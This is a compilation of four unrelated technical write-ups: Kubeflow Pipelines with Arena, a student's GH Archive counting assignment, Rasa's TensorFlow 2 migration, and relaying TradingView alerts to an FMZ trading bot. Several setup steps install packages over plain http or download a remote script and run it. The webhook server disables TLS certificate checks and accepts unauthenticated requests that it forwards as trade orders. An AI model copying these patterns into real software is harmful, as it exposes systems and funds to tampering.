- Code synchronization: pass sync_source when calling the API, and set GIT_SYNC_REV in env to pin the commit ID of the code to be trained.
- Metrics collection: first, specify the metrics to collect and their display format, PERCENTAGE or RAW, for example metrics=["Train-accuracy:PERCENTAGE"]; second, output {metrics name}={value} or {metrics name}:{value} in the actual model code, because Pipelines collects metrics from stdout logs by default. For more information, see the sample code.
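As a minimal sketch of the metrics side (the value is hypothetical), the training code only needs to print the metric in that form for Pipelines to pick it up from stdout:

# Hypothetical sketch: Pipelines scrapes stdout, so emitting the metric is just a print.
accuracy = 0.972  # assume this came from the evaluation step
print("Train-accuracy=%s" % accuracy)  # matches metrics=["Train-accuracy:PERCENTAGE"]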
Because data is set to ["user-susan:/training"], the same value as in prepare_data, the training code can read the corresponding data, for example through --data_dir /training/dataset/mnist.
This step depends on prepare_data; referencing prepare_data.output in the command declares the dependency between the two steps.
The export_model step generates a training model from the checkpoint produced by the train step.
export_model = arena.standalone_job_op(
    name="export-model",
    image="tensorflow/tensorflow:1.11.0-py3",
    sync_source="https://code.aliyun.com/xiaozhou/tensorflow-sample-code.git",
    env=["GIT_SYNC_REV=%s" % (commit)],
    data=data,
    command="echo %s;python code/tensorflow-sample-code/tfjob/docker/mnist/export_model.py --model_version=%s --checkpoint_path=/training/output/mnist /training/output/models" % (train.output, model_version))
The export_model step is similar to, and simpler than, the train step: it syncs the export code from Git and then uses the checkpoints in the shared directory /training/output/mnist to export the model.
The entire workflow is quite intuitive. Now, let's define a Python method to integrate the whole process:
@dsl.pipeline(
    name='pipeline to run jobs',
    description='shows how to run pipeline jobs.'
)
def sample_pipeline(learning_rate='0.01',
                    dropout='0.9',
                    model_version='1',
                    commit='f097575656f927d86d99dd64931042e1a9003cb2'):
@dsl.pipeline is a decorator that marks the method as a workflow. It defines two attributes: name and description.
The entry point method sample_pipeline defines four parameters: learning_rate, dropout, model_version, and commit. These can be used at the train and export_model stages shown above. The parameter values are actually dsl.PipelineParam objects, so the native Kubeflow Pipelines UI can render them as input forms: the keyword of a form field is the parameter's name, and its default value is the parameter's value. Note that a dsl.PipelineParam value can only be a string or a number; arrays, maps, and custom types cannot be converted.
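As a minimal sketch of what that means in practice (the pipeline name and command are hypothetical, not from this article): inside the pipeline body, each default turns into a placeholder object rather than a plain Python value.

import kfp.dsl as dsl

@dsl.pipeline(name="param-demo", description="how defaults become form fields")
def param_demo(learning_rate='0.01', model_version='1'):
    # learning_rate is a dsl.PipelineParam here; "%s" renders a placeholder
    # that the engine substitutes at run time, which is why only strings and
    # numbers survive the conversion.
    cmd = "python main.py --learning_rate %s" % learning_rate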
In fact, you can overwrite these parameters when submitting a workflow; the submission UI renders an input form for them.
The Python domain-specific language (DSL) you used to develop the workflow can be submitted to the Kubeflow Pipelines service running in your own Kubernetes cluster, and submitting the code is easy:
import kfp
import kfp.compiler as compiler

KFP_SERVICE = "ml-pipeline.kubeflow.svc.cluster.local:8888"
# EXPERIMENT_NAME and RUN_ID are assumed placeholders; name them to suit your setup.
EXPERIMENT_NAME = "mnist"
RUN_ID = "run-1"

compiler.Compiler().compile(sample_pipeline, __file__ + '.tar.gz')
client = kfp.Client(host=KFP_SERVICE)
try:
    experiment_id = client.get_experiment(experiment_name=EXPERIMENT_NAME).id
except:
    experiment_id = client.create_experiment(EXPERIMENT_NAME).id
run = client.run_pipeline(experiment_id, RUN_ID, __file__ + '.tar.gz',
                          params={'learning_rate': learning_rate,
                                  'dropout': dropout,
                                  'model_version': model_version,
                                  'commit': commit})
First, run compiler.compile to compile the Python code into a DAG configuration file that can be identified by the execution engine Argo.
Second, on the Kubeflow Pipelines client, create an experiment or find an existing experiment and submit the previously compiled DAG configuration file.
Third, prepare a Python 3 environment in the cluster and install the Kubeflow Pipelines software development kit (SDK):
# kubectl create job pipeline-client --namespace kubeflow --image python:3 -- sleep infinity
# kubectl exec -it -n kubeflow $(kubectl get po -l job-name=pipeline-client -n kubeflow | grep -v NAME| awk '{print $1}') bash
Fourth, log on to the Python 3 environment and run the following commands to submit two tasks with different parameters:
# pip3 install http://kubeflow.oss-cn-beijing.aliyuncs.com/kfp/0.1.14/kfp.tar.gz --upgrade
# pip3 install http://kubeflow.oss-cn-beijing.aliyuncs.com/kfp-arena/kfp-arena-0.4.tar.gz --upgrade
# curl -O https://raw.githubusercontent.com/cheyang/pipelines/update_standalone_sample/samples/arena-samples/standalonejob/standalone_pipeline.py
# python3 standalone_pipeline.py --learning_rate 0.0001 --dropout 0.8 --model_version 2
# python3 standalone_pipeline.py --learning_rate 0.0005 --dropout 0.8 --model_version 3
Log on to the Kubeflow Pipelines UI: https://{pipeline address}/pipeline/#/experiments. For example:
https://11.124.285.171/pipeline/#/experiments
To compare metrics such as the input, duration, and accuracy of the two experiments, click the Compare runs button. Making experiments traceable through Kubeflow Pipelines' experiment management is the first step toward making them reproducible.
To implement a runnable Kubeflow pipeline, you can take one of two approaches.
If you use the native dsl.container_op API, you need to construct two parts of code: the runtime code that each step executes inside its container, and the pipeline code that describes how the steps are wired together. For example:
# assumes: from kubernetes import client as k8s_client
container_op = dsl.ContainerOp(
    name=name,
    image='<train-image>',
    arguments=[
        '--input_dir', input_dir,
        '--output_dir', output_dir,
        '--model_name', model_name,
        '--model_version', model_version,
        '--epochs', epochs
    ],
    file_outputs={'output': '/output.txt'}
)
container_op.add_volume(k8s_client.V1Volume(
    host_path=k8s_client.V1HostPathVolumeSource(
        path=persistent_volume_path),
    name=persistent_volume_name))
container_op.add_volume_mount(k8s_client.V1VolumeMount(
    mount_path=persistent_volume_path,
    name=persistent_volume_name))
The native dsl.container_op API is flexible: it exposes the interface that interacts with Pipelines directly, so users can do a great deal through container_op. However, it also has drawbacks: each container_op performs an operation on a single container, so to support distributed training you must submit and manage tasks such as TensorFlow training jobs (TFJobs) through container_op yourself. This adds complexity, and it poses a security challenge, because pipeline developers must be granted additional permissions to submit TFJob-like tasks.
Alternatively, you can use the reusable component API arena_op. Its universal runtime code spares you from writing runtime code repeatedly, and the API is user-friendly and supports both the PS and MPI scenarios. We recommend this method for compiling pipelines.
|
Software Engineering 2020: First Individual Programming Assignment
Course of this assignment: https://edu.cnblogs.com/campus/fzu/SE2020
Assignment requirements: https://edu.cnblogs.com/campus/fzu/SE2020/homework/11167
Goals of this assignment: learn to use git, how to handle JSON text in Python, forking a GitHub repository and opening a pull request, and using coverage to measure code coverage and optimize the code
Student ID: 031802515
PSP Table
PSP2.1 | Personal Software Process Stages | Estimated (min) | Actual (min)
Planning | Plan | 20 | 20
Estimate | Estimate how long this task will take | 10 | 10
Development | Development | 30 | 20
Analysis | Requirements analysis (including learning new technologies) | 50 | 30
Design Spec | Produce design documents | 10 | 5
Design Review | Design review | 10 | 10
Coding Standard | Coding standard (define a suitable standard for this development) | 15 | 15
Design | Detailed design | 30 | 30
Coding | Coding | 250 | 200
Code Review | Code review | 30 | 30
Test | Testing (self-testing, fixing code, committing changes) | 240 | 200
Reporting | Report | 60 | 60
Test Report | Test report | 20 | 20
Size Measurement | Size measurement | 10 | 10
Postmortem & Process Improvement Plan | Postmortem and process improvement plan | 60 | 90
Total |  | 755 | 660
Approach
After getting the assignment, I downloaded the data first and could not make sense of it. I then read what had to be counted and still did not understand what the assignment wanted. So I swallowed my pride and asked an experienced classmate, who told me to first learn the JSON data format. After watching a few lessons on JSON on Bilibili, I realized it is simply a format for recording data that is convenient to process in Python, so I decided to write the solution in Python.
I finally understood the task: in the GH Archive JSON files, count the number of each of the 4 event types per user, per repository, or per user within each repository. The assignment also required committing the code to GitHub with git and using .gitignore to exclude certain files, so I followed the TA's git tutorial on Bilibili and downloaded and configured git.
After reading the teacher's code style requirements, I started coding. The program has three parts: reading the JSON files in a folder, searching the JSON for specific data, and counting the matches.
Design and Implementation
Problem breakdown:
First, obtain the command-line arguments, and use them to drive the data search.
Implementation:
Command-line arguments are extracted with the getopt method.
For data search and counting, reading multiple .json files requires the os.walk() method to traverse the files in a folder, and the .append() and json.loads() methods store the records from all files in a single list.
Specific data is located with the .find() method.
Counting is done by multi-level iteration, treating each line as an independent element and accumulating matches.
Flowchart of key functions
Key code
JSON parsing
import json
import os

def read(path):
    """Read every file under path and parse each line as a JSON record."""
    global data
    data = []
    path_all = []
    for root, dirs, files in os.walk(path):
        for file in files:
            path_all.append(os.path.join(root, file))
    for i in range(0, len(path_all)):
        with open(path_all[i], 'r', encoding='utf8') as f:
            for line in f:
                data.append(json.loads(line))
Setting the command-line options
opt, arv = getopt.getopt(sys.argv[1:], 'i:u:r:e:', ['user=', 'repo=', 'event=', 'init='])
Parsing the search parameters
import getopt
import sys

def get_cmd():
    """Parse command-line options into the module-level search parameters."""
    global path, user, repo, event, judger, length
    # 'djista' is a sentinel value meaning "not supplied"
    path, user, repo, event = 'djista', 'djista', 'djista', 'djista'
    opt, arv = getopt.getopt(sys.argv[1:], 'i:u:r:e:', ['user=', 'repo=', 'event=', 'init='])
    if len(opt):
        length = len(opt)
        for i in range(0, len(opt)):
            if opt[i][0] == '-i':
                path = opt[i][1]
            elif opt[i][0] == '-u':
                user = opt[i][1]
                judger = 1
            elif opt[i][0] == '-r':
                repo = opt[i][1]
                judger = 2
            elif opt[i][0] == '-e':
                event = opt[i][1]
            else:
                break
    else:
        print('Input command error')
Computing the counts
def find_data():
    """Count records matching the user/repo/event given on the command line."""
    result = 0
    # each input line is stored as its own element of the data list
    # search by user
    for i in range(0, len(data)):
        data_str = str(data[i])
        if judger == 1:
            if data_str.find(user) != -1:
                if data_str.find(event) != -1:
                    result = result + 1
        if judger == 2:
            if length == 3:
                if data_str.find(repo) != -1:
                    if data_str.find(event) != -1:
                        result = result + 1
            else:
                if data_str.find(repo) != -1:
                    if data_str.find(event) != -1:
                        if data_str.find(user) != -1:
                            result = result + 1
    print(result)
Unit test screenshots and explanation
Parsing a 24.9 MB JSON file took 0.68 s.
Unit test coverage with these parameters: 79%.
Parsing a 998 MB JSON file took 14.75 s.
Unit test coverage with these parameters: 83%.
My program's execution results
Unit test optimization
Because the program ran slowly, I planned to optimize it by rewriting it with multiple threads, but being inexperienced, the multithreaded version actually ran even slower.
Key multithreading code
# requires: import threading, time; read_1, ooopen and count are the
# author's helpers defined elsewhere in the project
if __name__ == '__main__':
    sum = []
    start_time = time.time()
    get_cmd()
    read_1(path)
    t1 = threading.Thread(target=ooopen, args=(0, 2))
    t2 = threading.Thread(target=ooopen, args=(2, 4))
    t3 = threading.Thread(target=ooopen, args=(4, 6))
    t4 = threading.Thread(target=ooopen, args=(6, count))
    #t3 = threading.Thread(target=find_data)
    t1.start()
    t2.start()
    t3.start()
    t4.start()
    # join all four threads so every partial sum is ready before adding them
    t1.join()
    t2.join()
    t3.join()
    t4.join()
    print(sum[0] + sum[1] + sum[2] + sum[3])
    end_time = time.time()  # record the program's end time
    print('Took %f seconds' % (end_time - start_time))
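The slowdown is most likely CPython's global interpreter lock: json.loads is CPU-bound, so threads end up taking turns instead of running in parallel. A minimal sketch of a process-based alternative, assuming a hypothetical count_file(path) helper that parses one file and returns its match count:

from multiprocessing import Pool

def count_all(paths):
    # Processes sidestep the GIL, so CPU-bound parsing can actually run in parallel.
    with Pool() as pool:
        return sum(pool.map(count_file, paths))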
Link to my coding standard
Summary
Because I could not understand the problem at first, I assumed I could not do it at all, procrastinated for days, and wasted a lot of time.
When first learning JSON, I did not know where to start and read many CSDN and cnblogs articles; for completely unfamiliar topics, going straight to a course actually builds understanding much faster.
I was unfamiliar with Python at the start and had to look up many methods before I could use them, and I asked experienced classmates about the algorithms, so I still need to get more fluent in Python.
I learned to use coverage to measure Python code coverage.
I learned a lot from this assignment and hope to further improve my problem-solving ability and coding proficiency.
|
December 16, 2020 — A guest post by Vincent D. Warmerdam and Vladimir Vlasov, Rasa
At Rasa, we are building infrastructure for conversational AI, used by developers to build chat- and voice-based assistants. Rasa Open Source, our cornerstone product offering, provides a framework for NLU (Natural Language Understanding) and dialogue management. On the NLU side we offer models that handle intent classification and entity detection using models built with Tensorflow 2.x.
In this article, we would like to discuss the benefits of migrating to the latest version of TensorFlow and also give insight into how some of the Rasa internals work.
When you’re building a virtual assistant with Rasa Open Source, you’ll usually begin by defining stories, which represent conversations users might have with your agent. These stories will serve as training data and you can configure them as yaml files. If we pretend that we’re making an assistant that allows you to buy pizzas online then we might have stories in our configuration that look like this:
version: "2.0"
stories:
- story: happy path
  steps:
  - intent: greet
  - action: utter_greet
  - intent: mood_great
  - action: utter_happy
- story: purchase path
  steps:
  - intent: greet
  - action: utter_greet
  - intent: purchase
    entities:
    - product: "pizza"
  - action: confirm_purchase
  - intent: affirm
  - action: confirm_availability
These stories consist of intents and actions. Actions can be simple text replies, or they can trigger custom Python code (that checks a database, for instance). To define training data for each intent, you supply the assistant with example user messages, which might look something like:
version: "2.0"
nlu:
- intent: greet
  examples: |
    - hey
    - hello
    - hi
    - hello there
    - good morning
- intent: purchase
  examples: |
    - i’d like to buy a [veggie pizza](product) for [tomorrow](date_ref)
    - i want to order a [pizza pepperoni](product)
    - i’d want to buy a [pizza](product) and a [cola](product)
    - ...
When you train an assistant using Rasa you’ll supply configuration files like those shown above. You can be very expressive in the types of conversations your agent can handle. Intents and actions are like lego bricks and can be combined expressively to cover many conversational paths. Once these files are defined they are combined to create a training dataset that the agent will learn from.
Rasa allows users to build custom machine learning pipelines to fit their datasets. That means you can incorporate your own (pre-trained) models for natural language understanding if you’d like. But Rasa also provides models, written in TensorFlow, that are specialized for these tasks.
You may have noticed that our examples include not just intents but also entities. When a user is interested in making a purchase, they (usually) also say what they’re interested in buying. This information needs to be detected when the user provides it. It’d be a bad experience if we needed to supply the user with a form to retrieve this information.
If you take a step back and think about what kind of model could work well here, you'll soon recognize that it's not a standard task. It's not just that we have numerous labels at each utterance; we have multiple types of labels too. That means we need models that have two outputs.
Rasa Open Source offers a model that can detect both intents and entities, called DIET. It uses a transformer architecture that allows the system to learn from the interaction between intents and entities. Because it needs to handle these two tasks at once, the typical machine learning pattern won’t work:
model.fit(X, y).predict(X)
You need a different abstraction.
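To make the two-output idea concrete, here is a generic Keras sketch (not DIET's actual architecture): one shared encoder with separate heads for the utterance-level intent and the per-token entity labels. The shapes and layer choices are illustrative assumptions.

import tensorflow as tf

tokens = tf.keras.Input(shape=(None, 128))  # assumed featurized token sequence
encoded = tf.keras.layers.LSTM(64, return_sequences=True)(tokens)
# one label per utterance
intent = tf.keras.layers.Dense(10, activation="softmax", name="intent")(
    tf.keras.layers.GlobalAveragePooling1D()(encoded))
# one label per token
entities = tf.keras.layers.Dense(5, activation="softmax", name="entities")(encoded)
model = tf.keras.Model(inputs=tokens, outputs=[intent, entities])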
Abstraction
This is where TensorFlow 2.x has made an improvement to the Rasa codebase. It is now much easier to customize TensorFlow classes. In particular, we've made a custom abstraction on top of Keras to suit our needs. One example of this is Rasa's own internal `RasaModel`. We've added the base class's signature below. The full implementation can be found here.
class RasaModel(tf.keras.models.Model):

    def __init__(
        self,
        random_seed: Optional[int] = None,
        tensorboard_log_dir: Optional[Text] = None,
        tensorboard_log_level: Optional[Text] = "epoch",
        **kwargs,
    ) -> None:
        ...

    def fit(
        self,
        model_data: RasaModelData,
        epochs: int,
        batch_size: Union[List[int], int],
        evaluate_on_num_examples: int,
        evaluate_every_num_epochs: int,
        batch_strategy: Text,
        silent: bool = False,
        eager: bool = False,
    ) -> None:
        ...
This object is customized to allow us to pass in our own `RasaModelData` object. The benefit is that we can keep all the existing features that the Keras model object offers while we can override a few specific methods to suit our needs. We can run the model with our preferred data format while maintaining manual control over “eager mode,” which helps us debug.
These Keras objects are now a central API in TensorFlow 2.x, which made it very easy for us to integrate and customize.
Training Loop
To give another impression of how the code became simpler, let’s look at the training loop inside the Rasa model.
Python Pseudo-Code for TensorFlow 1.8
We've listed part of the code for our old training loop below (see here for the full implementation). Note that it uses `session.run` to compute both the loss and the accuracy.
def train_tf_dataset(
    train_init_op: "tf.Operation",
    eval_init_op: "tf.Operation",
    batch_size_in: "tf.Tensor",
    loss: "tf.Tensor",
    acc: "tf.Tensor",
    train_op: "tf.Tensor",
    session: "tf.Session",
    epochs: int,
    batch_size: Union[List[int], int],
    evaluate_on_num_examples: int,
    evaluate_every_num_epochs: int,
):
    session.run(tf.global_variables_initializer())
    pbar = tqdm(range(epochs), desc="Epochs", disable=is_logging_disabled())
    for ep in pbar:
        ep_batch_size = linearly_increasing_batch_size(ep, batch_size, epochs)
        session.run(train_init_op, feed_dict={batch_size_in: ep_batch_size})
        ep_train_loss = 0
        ep_train_acc = 0
        batches_per_epoch = 0
        while True:
            try:
                _, batch_train_loss, batch_train_acc = session.run(
                    [train_op, loss, acc])
                batches_per_epoch += 1
                ep_train_loss += batch_train_loss
                ep_train_acc += batch_train_acc
            except tf.errors.OutOfRangeError:
                break
The train_tf_dataset function requires a lot of tensors as input. In TensorFlow 1.8, you need to keep track of these tensors because they contain all the operations you intend to run. In practice, this can lead to cumbersome code because it is hard to separate concerns.
Python Pseudo-Code for TensorFlow 2.x
In TensorFlow 2, all of this has been made much easier because of the Keras abstraction. We can inherit from a Keras class that allows us to compartmentalize the code much better. Here is the `train` method from Rasa’s DIET classifier (see here for the full implementation).
def train(
    self,
    training_data: TrainingData,
    config: Optional[RasaNLUModelConfig] = None,
    **kwargs: Any,
) -> None:
    """Train the embedding intent classifier on a data set."""
    model_data = self.preprocess_train_data(training_data)

    self.model = self.model_class()(
        config=self.component_config,
    )

    self.model.fit(
        model_data,
        self.component_config[EPOCHS],
        self.component_config[BATCH_SIZES],
        self.component_config[EVAL_NUM_EXAMPLES],
        self.component_config[EVAL_NUM_EPOCHS],
        self.component_config[BATCH_STRATEGY],
    )
The object-oriented style of programming from Keras allows us to customize more. We’re able to implement our own `self.model.fit` in such a way that we don’t need to worry about the `session` anymore. We don’t even need to keep track of the tensors because the Keras API abstracts everything away for you.
It’s not just the Keras models where we apply this abstraction; we’ve also developed some neural network layers using a similar technique.
We’ve implemented a few custom layers ourselves. For example, we’ve got a layer called `DenseWithSparseWeights.` It behaves just like a dense layer, but we drop many weights beforehand to make it more sparse. Again we only need to inherit from the right class (tf.keras.layers.Dense) to create it.
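A rough sketch of that idea (not Rasa's actual implementation): subclass tf.keras.layers.Dense and multiply the kernel by a fixed random binary mask so most weights are dropped. The sparsity value is an illustrative assumption.

import tensorflow as tf

class SparseDense(tf.keras.layers.Dense):
    """Dense layer whose kernel is masked so most weights stay zero (sketch)."""

    def __init__(self, units, sparsity=0.8, **kwargs):
        super().__init__(units, **kwargs)
        self.sparsity = sparsity

    def build(self, input_shape):
        super().build(input_shape)
        # Freeze a random mask: roughly `sparsity` of the weights are dropped.
        mask = tf.random.uniform(self.kernel.shape) > self.sparsity
        self.kernel_mask = tf.cast(mask, self.kernel.dtype)

    def call(self, inputs):
        outputs = tf.matmul(inputs, self.kernel * self.kernel_mask)
        if self.use_bias:
            outputs = outputs + self.bias
        return self.activation(outputs)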
We’ve grown so fond of customizing that we’ve even implemented a loss function as a layer. This made a lot of sense for us, considering that losses can get complex in NLP. Many NLP tasks will require you to sample such that you also have labels of negative examples during training. You may also need to mask tokens during the process. We’re also interested in recording the similarity loss as well as the label accuracy. By just making our own layer, we are building components for re-use, and it is easy to maintain as well.
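As a sketch of the loss-as-a-layer pattern (simplified, not Rasa's real loss): the layer computes similarity logits against label embeddings and registers the cross-entropy with add_loss, so Keras folds it into training without a compile-time loss function.

import tensorflow as tf

class DotProductLoss(tf.keras.layers.Layer):
    # Sketch: the loss lives inside the layer; model.fit picks it up via add_loss.
    def call(self, inputs, label_embeddings, label_ids):
        sim = tf.matmul(inputs, label_embeddings, transpose_b=True)
        loss = tf.reduce_mean(
            tf.nn.sparse_softmax_cross_entropy_with_logits(
                labels=label_ids, logits=sim))
        self.add_loss(loss)
        return sim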
Lessons Learned
Discovering this opportunity for customization made a massive difference for Rasa. We like to design our algorithms to be flexible and applicable in many circumstances, and we were happy to learn that the underlying technology stack allowed us to do so. For folks working on their own TensorFlow migration, the main lesson runs through this whole article: the Keras objects are now the central API, and subclassing them is usually easier than building your own abstractions from scratch.
|
TradingView is a good charting tool for market quotes, and its Pine script is powerful as well.
With backtesting, alerts, and all kinds of integrations, it is a very complete financial tool.
But two issues have been plaguing us…
Today's article walks you through solving the exchange integration issue.
The overall idea is this:
TV (TradingView) Pine script -> signal alert webhook -> local webhook server forwards the request -> FMZ bot receives the request and trades
Let's go step by step.
Go to the TradingView website:
Next, create an Alert; see the figure below for details.
A few things in the picture need attention when generating the Alert: the expiration time, the webhook URL, and the message content must all be set correctly.
The expiration time is self-explanatory: the alert stops firing once it expires…
Leave the Webhook URL empty for now; we will fill it in once the local webhook service is ready.
For the Message, it is best to make it unambiguous, so the bot can tell the Alert messages apart.
I generally set it to: strategy name, order quantity, and trading direction.
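For example, a message like the following (the strategy name is hypothetical) is easy for the bot to split on commas later:

VMA strategy,BUY,1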
So far, the TradingView part is basically done!
Next, let's get the local webhook service working.
Googling this kind of task turns up plenty of results, so this article skips the details; you can set it up yourself.
Here is a simple framework for Python:
GitHub: https://github.com/shawn-sterling/gitlab-webhook-receiver
It is safe, worry-free, and convenient, but it has one issue: the little framework will occasionally die on its own! Please watch out for this.
So I wrote another script on the server that restarts the service whenever "die" or "offline" appears in the log. Still not feeling safe, I also scheduled a restart at an unimportant minute of every hour. It has now run safely for two months with no more lost signals.
In addition, TradingView only talks to port 80, so don't change the service port.
So far, we have the Alert messages flowing. Next, how do we reach the bot?
You may have noticed the API documentation at the bottom of FMZ's site: we can pass commands to our little bot through this API! The specific request example is shown there; the red box marks the request we need.
Some preparation is needed: an FMZ API key (avatar -> account settings -> API interface) and a bot that has been started, whose ID we need (the number in a bot's URL is its ID).
Next, we modify the webhook service so that, after receiving a message, it automatically forwards it to the FMZ bot.
Finally, don't forget to fill the finished webhook address into the TradingView Alert (format: http://xx.xx.xx.xx:80).
The following is the service code I modified; you can use it as a reference:
#!/usr/bin/python -tt
# -*- coding: UTF-8 -*-

from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
import json
import logging
import logging.handlers
import os
import re
import shutil
import subprocess
import time
import ssl

ssl._create_default_https_context = ssl._create_unverified_context

try:
    import md5
    import urllib2
    from urllib import urlencode
except:
    import hashlib as md5
    import urllib.request as urllib2
    from urllib.parse import urlencode

############################################################
##### You will likely need to change some of the below #####

# log file for this script
log_file = '/root/webhook/VMA/webhook.log'

# Bot api licence
accessKey = ''
secretKey = ''

# HTTP config
log_max_size = 25165824  # 24 MB
log_level = logging.INFO
#log_level = logging.DEBUG # DEBUG is quite verbose
listen_port = 80

##### You should stop changing things unless you know what you are doing #####
##############################################################################

log = logging.getLogger('log')
log.setLevel(log_level)
log_handler = logging.handlers.RotatingFileHandler(log_file,
                                                   maxBytes=log_max_size,
                                                   backupCount=4)
f = logging.Formatter("%(asctime)s %(filename)s %(levelname)s %(message)s",
                      "%B %d %H:%M:%S")
log_handler.setFormatter(f)
log.addHandler(log_handler)


class webhookReceiver(BaseHTTPRequestHandler):

    def run_it(self, cmd):
        """
        runs a command
        """
        p = subprocess.Popen(cmd.split(), stdout=subprocess.PIPE,
                             stderr=subprocess.STDOUT)
        log.debug('running:%s' % cmd)
        p.wait()
        if p.returncode != 0:
            log.critical("Non zero exit code:%s executing: %s" % (p.returncode,
                                                                  cmd))
        return p.stdout

    def bot_command(self, method, *args):
        """
        send command request to bot api
        """
        d = {
            'version': '1.0',
            'access_key': accessKey,
            'method': method,
            'args': json.dumps(list(args)),
            'nonce': int(time.time() * 1000),
        }
        d['sign'] = md5.md5(('%s|%s|%s|%d|%s' % (d['version'], d['method'], d['args'], d['nonce'], secretKey)).encode('utf-8')).hexdigest()
        return json.loads(urllib2.urlopen('https://www.fmz.com/api/v1', urlencode(d).encode('utf-8')).read().decode('utf-8'))

    def do_POST(self):
        """
        receives post, handles it
        """
        log.debug('got post')
        message = 'OK'
        self.rfile._sock.settimeout(5)
        data_string = self.rfile.read(int(self.headers['Content-Length']))
        log.info(data_string)
        self.send_response(200)
        self.send_header("Content-type", "text")
        self.send_header("Content-length", str(len(message)))
        self.end_headers()
        self.wfile.write(message)
        log.debug('TV connection should be closed now.')
        #log.info(self.bot_command('GetRobotList', -1, -1, -1))  # GetRobotList(offset, length, robotStatus int) Pass -1 to get all
        log.info(self.bot_command('CommandRobot', 169788, data_string))  # CommandRobot(robotId int64, cmd string) Send commands to the robot

    def log_message(self, format, *args):
        """
        disable printing to stdout/stderr for every post
        """
        return


def main():
    """
    the main event.
    """
    try:
        server = HTTPServer(('', listen_port), webhookReceiver)
        log.info('started web server...')
        server.serve_forever()
    except KeyboardInterrupt:
        log.info('ctrl-c pressed, shutting down.')
        server.socket.close()


if __name__ == '__main__':
    main()
All of the above covers the communication layer; our bot's trading strategy also needs corresponding handling to process the received signals.
Take the Alert Message designed at the beginning as an example; you can adapt it to your own preferences and specific needs.
The code below gets the message, filters it, performs the operation, and ends.
function get_Command() { // Interaction function: picks up interactive commands in time; users can extend it themselves
    var way = null; // route
    var cmd = GetCommand(); // Get interactive command API
    var cmd_arr = cmd.split(",");
    if (cmd) {
        // Define the route
        if (cmd.indexOf("BUY,1") != -1) {
            way = 1;
        }
        if (cmd.indexOf("SELL,1") != -1) {
            way = 2;
        }
        if (cmd.indexOf("BUY,2") != -1) {
            way = 3;
        }
        if (cmd.indexOf("SELL,2") != -1) {
            way = 4;
        }
        // Branch selection operation
        switch (way) {
            case 1:
                xxx
                break;
            case 2:
                xxx
                break;
            case 3:
                xxx
                break;
            case 4:
                xxx
                break;
            default:
                break;
        }
    }
}
That's the end of this article. I hope it helps you!
|